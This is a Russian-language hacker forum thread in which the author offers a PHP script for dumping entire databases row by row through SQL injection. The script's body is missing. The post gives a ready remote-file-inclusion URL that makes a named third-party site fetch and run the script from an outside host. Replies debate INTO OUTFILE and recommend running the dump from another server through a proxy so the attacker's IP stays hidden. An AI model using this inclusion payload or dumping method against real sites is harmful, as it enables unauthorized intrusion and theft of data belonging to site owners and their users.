![]() |
Слив базы через SQL-inj в цикле
Может было уже, но не нащел, по этому пишу свою статью..
Дорогой Олл, часто бывает так, что на сайте нельзя вывести всю базу сразу, а можно только одной строкой, и далее приходится перебирать через limit. Можно ли автоматизировать этот процесс?? Да. Можно. И сегодня я вам расскажу, как это сделать! Сегодня передо мною стала именна такая проблема и я написал небольшой скриптик для этого.. Код:
<?phpДалее ищем сайт, уязвимый php-inj, например *http://www.ultriplo.com/index.php?page=[url].php и запускаем скрипт *http://www.ultriplo.com/index.php?page=http://standmp3.narod.ru/get Таким образом даже через модем мы можем быстро вытащить всю базу... Скорость зависит от ширины канала того сайта, на котором мы запускаем скрипт... Вот! :) Спасибо за внимание.. Created by 5hr4M... |
Цитата:
Если тока, черезчур много кода.. ну уж без него никак.. :( |
а через инто аутфайл никак? да и слить упакованную в архив бд лудше--- или если уж так и сливать то лудше сразу с локали запускать и лить себе -- чет как-то хз помойму не слишком разумный метод делать дамп базы
|
into outfile тоже не всегда работает.. нет прав записи часто..
А если лить с локали 1) Палишь ip 2) Скорость маленькая 3) Трафа жрет А так скрипт исполняется на другой машине, с которой можно его через proxy запросить.. |
Цитата:
2) и 3) -- полюбому потом придется лить все это с того сайта на который закачал.......... |
Цитата:
2) Ты хоть разбирался как скрипт работает?? Объясню.. Он запрашивает с атакуемого сайта страницу, находит в ней нужные данные и выводит их на экран.. А теперь прикинь какая экономия траффика? Запросить 1000 страниц или скачать 1000 строчек с сайта??? Подумай над этим... |
|
вообще, это слишком простенько и неинтересно, чтоб посвещать такому скриптику целую статью.. ведь извлекать из базы подобным образом инфу - это тривиальнейшая задача, которую тут, наверно, каждому второму хоть раз приходилось решать..
>> Реализация прикольная токо можно привинтить что бы не в файл лилось а в бд. имхо проще уже потом из файла перекинуть все в БД.. |
| Время: 10:30 |